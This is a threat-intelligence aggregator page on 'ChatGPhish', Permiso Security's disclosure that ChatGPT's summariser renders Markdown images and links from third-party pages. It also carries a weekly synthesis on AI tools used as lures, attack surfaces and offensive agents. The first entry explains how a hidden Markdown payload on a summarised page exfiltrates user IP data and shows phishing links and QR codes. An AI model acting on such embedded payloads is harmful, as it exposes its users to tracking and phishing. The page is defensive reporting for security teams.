ctipilot.ch

ChatGPhish

campaign · campaign:chatgphish-chatgpt-markdown-rendering-flaw-permiso-security

ChatGPhish — ChatGPT Markdown renderer trusts third-party image URLs

Coverage timeline
2
first 2026-05-25 → last 2026-05-30
Entries
2
2 distinct days
Sources cited
6
6 hosts
Sections touched
2
research, weekly-multi-day
Co-occurring entities
1
see Related entities below
2026-05-252 appearances2026-05-30

Story timeline

  1. 2026-05-30ChatGPhish: Permiso Security documents ChatGPT Markdown renderer trusting third-party image URLs and links — used for IP exfiltration and phishing via legitimate chatgpt.com
    researchChatGPhish: Permiso Security documents ChatGPT Markdown renderer trusting third-party image URLs and links — used for IP exfiltration and phishing via
  2. 2026-05-25AI tooling as lure, attack surface and force-multiplier — the cross-day pattern no single daily framed whole
    weekly-multi-dayAI tooling as lure, attack surface and force-multiplier — the cross-day pattern no single daily framed whole

Where this entity is cited

  • weekly-multi-day1
  • research1

Source distribution

  • microsoft.com1 (17%)
  • permiso.io1 (17%)
  • pushsecurity.com1 (17%)
  • redcanary.com1 (17%)
  • sysdig.com1 (17%)
  • thehackernews.com1 (17%)

Related entities

Entries about ChatGPhish (2)

2026-05-30 · view entry permalink →

ChatGPhish: Permiso Security documents ChatGPT Markdown renderer trusting third-party image URLs and links — used for IP exfiltration and phishing via legitimate chatgpt.com

notable research discovered 2026-05-30 05:00 UTC

Permiso Security's P0 Labs (researcher Andi Ahmeti) disclosed on 29 May 2026 that ChatGPT's web summarisation feature unconditionally trusts and renders Markdown image URLs and links extracted from third-party pages, executing them inside the trusted chatgpt.com UI (Permiso Security P0 Labs, 2026-05-29; The Hacker News, 2026-05-29). An attacker embedding a small Markdown payload on any web page (GitHub README, SaaS dashboard, documentation portal) triggers the attack when a victim asks ChatGPT to summarise the page: the payload executes silently and can exfiltrate the victim's IP, User-Agent, and Referer via attacker-hosted image fetch; render malicious links styled as ChatGPT output; inject fake security alerts; and serve QR codes from attacker-controlled S3 buckets that bypass desktop URL filters by moving the click action to mobile. Permiso submitted to OpenAI via Bugcrowd on 29 April; after follow-up on 7 May, OpenAI marked it as not reproducible then as not applicable, without resolution. No CVE assigned. Defenders using ChatGPT for document summarisation in enterprise workflows should: restrict ChatGPT access to internal documentation portals; educate users that any AI-summarised third-party page can carry attacker instructions embedded in rendered output.

ai-abuse phishing info-disclosure global

2026-05-25 · view entry permalink →

AI tooling as lure, attack surface and force-multiplier — the cross-day pattern no single daily framed whole

notable synthesis discovered 2026-05-25 05:00 UTC

Five separate daily items this week, each minor on its own, line up into the most important emerging pattern of the window: AI products are now simultaneously a lure brand, an attack surface, and an offensive force-multiplier. As a lure: ACR Stealer was distributed through counterfeit Claude AI download pages promoted by malicious search ads (2026-05-26), and a cryptojacking campaign used AI-chatbot search-result poisoning to steer victims to GPU-utility lookalikes that dropped ScreenConnect and process-hollowed miners under a signed Microsoft binary (2026-05-28). As an attack surface: LLMShare malvertising hid fake outage pages inside ChatGPT share links to serve infostealers (2026-05-30); ChatGPhish abused the ChatGPT Markdown renderer's trust of third-party image URLs and links for IP exfiltration and phishing from legitimate chatgpt.com (2026-05-30); and Red Canary detailed Entra Agent ID privilege escalation, injecting credentials into agent blueprints for tenant-wide lateral movement (2026-05-30). As a force-multiplier: Sysdig TRT documented the first observed LLM-agent-driven post-exploitation, moving from a Marimo-notebook RCE (CVE-2026-39987) to internal-database exfiltration in four pivots in under an hour (2026-05-30).

The synthesis for a public-sector SOC: treat AI-brand download and search results as a live malvertising vector (block lookalike domains, prefer vendor-canonical download paths); scope DLP and egress controls to LLM rendering and share endpoints; and govern non-human agent identities (Entra Agent IDs, service-principal-equivalent AI agents) with the same conditional-access and credential-hygiene controls applied to service principals.

ai-abuse phishing infostealer identity cloud global